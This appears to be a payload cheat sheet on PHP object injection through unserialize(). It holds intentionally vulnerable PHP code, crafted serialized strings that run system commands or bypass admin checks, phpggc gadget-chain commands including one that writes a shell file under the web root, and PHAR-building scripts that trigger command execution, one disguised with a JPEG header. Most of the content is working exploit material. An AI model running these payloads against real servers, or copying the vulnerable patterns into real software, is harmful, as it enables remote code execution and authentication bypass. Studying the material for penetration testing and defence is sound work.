Insecure Deserialization/PHP.md
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
The following magic methods will help you for a PHP Object injection
__wakeup() when an object is unserialized.__destruct() when an object is deleted.__toString() when an object is converted to a string.Also you should check the Wrapper Phar:// in File Inclusion which use a PHP object injection.
Vulnerable code:
<?php
class PHPObjectInjection{
public $inject;
function __construct(){
}
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
}
if(isset($_REQUEST['r'])){
$var1=unserialize($_REQUEST['r']);
if(is_array($var1)){
echo "
".$var1[0]." - ".$var1[1];
}
}
else{
echo ""; # nothing happens here
}
?>
Craft a payload using existing code inside the application.
Basic serialized data
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
Command execution
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
Vulnerable code:
<?php
$data = unserialize($_COOKIE['auth']);
if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
$admin = true;
} else {
$admin = false;
}
Payload:
a:2:{s:8:"username";b:1;s:8:"password";b:1;}
Because true == "str" is true.
Vulnerable code:
<?php
class ObjectExample
{
var $guess;
var $secretCode;
}
$obj = unserialize($_GET['input']);
if($obj) {
$obj->secretCode = rand(500000,999999);
if($obj->guess === $obj->secretCode) {
echo "Win";
}
}
?>
Payload:
O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;}
We can do an array like this:
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
Also called "PHP POP Chains", they can be used to gain RCE on the system.
unserialize() function.__construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __serialize(), __unserialize(), __toString(), __invoke(), __set_state(), __clone(), and __debugInfo():
__construct(): PHP allows developers to declare constructor methods for classes. Classes which have a constructor method call this method on each newly-created object, so it is suitable for any initialization that the object may need before it is used. php.net__destruct(): The destructor method will be called as soon as there are no other references to a particular object, or in any order during the shutdown sequence. php.net__call(string $name, array $arguments): The $name argument is the name of the method being called. The $arguments argument is an enumerated array containing the parameters passed to the $name'ed method. php.net__callStatic(string $name, array $arguments): The $name argument is the name of the method being called. The $arguments argument is an enumerated array containing the parameters passed to the $name'ed method. php.net__get(string $name): __get() is utilized for reading data from inaccessible (protected or private) or non-existing properties. php.net__set(string $name, mixed $value): __set() is run when writing data to inaccessible (protected or private) or non-existing properties. php.net__isset(string $name): __isset() is triggered by calling isset() or empty() on inaccessible (protected or private) or non-existing properties. php.net__unset(string $name): __unset() is invoked when unset() is used on inaccessible (protected or private) or non-existing properties. php.net__sleep(): serialize() checks if the class has a function with the magic name __sleep(). If so, that function is executed prior to any serialization. It can clean up the object and is supposed to return an array with the names of all variables of that object that should be serialized. If the method doesn't return anything then null is serialized and E_NOTICE is issued.php.net__wakeup(): unserialize() checks for the presence of a function with the magic name __wakeup(). If present, this function can reconstruct any resources that the object may have. The intended use of __wakeup() is to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks. php.net__serialize(): serialize() checks if the class has a function with the magic name __serialize(). If so, that function is executed prior to any serialization. It must construct and return an associative array of key/value pairs that represent the serialized form of the object. If no array is returned a TypeError will be thrown. php.net__unserialize(array $data): this function will be passed the restored array that was returned from __serialize(). php.net__toString(): The __toString() method allows a class to decide how it will react when it is treated like a string php.net__invoke(): The __invoke() method is called when a script tries to call an object as a function. php.net__set_state(array $properties): This static method is called for classes exported by var_export(). php.net__clone(): Once the cloning is complete, if a __clone() method is defined, then the newly created object's __clone() method will be called, to allow any necessary properties that need to be changed. php.net__debugInfo(): This method is called by var_dump() when dumping an object to get the properties that should be shown. If the method isn't defined on an object, then all public, protected and private properties will be shown. php.netambionics/phpggc is a tool built to generate the payload based on several frameworks:
phpggc monolog/rce1 'phpinfo();' -s
phpggc monolog/rce1 assert 'phpinfo()'
phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
Using phar:// wrapper, one can trigger a deserialization on the specified file like in file_get_contents("phar://./archives/app.phar").
A valid PHAR includes four elements:
__HALT_COMPILER(); at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub.Example of a Phar creation in order to exploit a custom PDFGenerator.
<?php
class PDFGenerator { }
//Create a new instance of the Dummy class and modify its property
$dummy = new PDFGenerator();
$dummy->callback = "passthru";
$dummy->fileName = "uname -a > pwned"; //our payload
// Delete any existing PHAR archive with that name
@unlink("poc.phar");
// Create a new archive
$poc = new Phar("poc.phar");
// Add all write operations to a buffer, without modifying the archive on disk
$poc->startBuffering();
// Set the stub
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
/* Add a new file in the archive with "text" as its content*/
$poc["file"] = "text";
// Add the dummy object to the metadata. This will be serialized
$poc->setMetadata($dummy);
// Stop buffering and write changes to disk
$poc->stopBuffering();
?>
Example of a Phar creation with a JPEG magic byte header since there is no restriction on the content of stub.
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}
function __destruct() {
system($this->data);
}
}
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();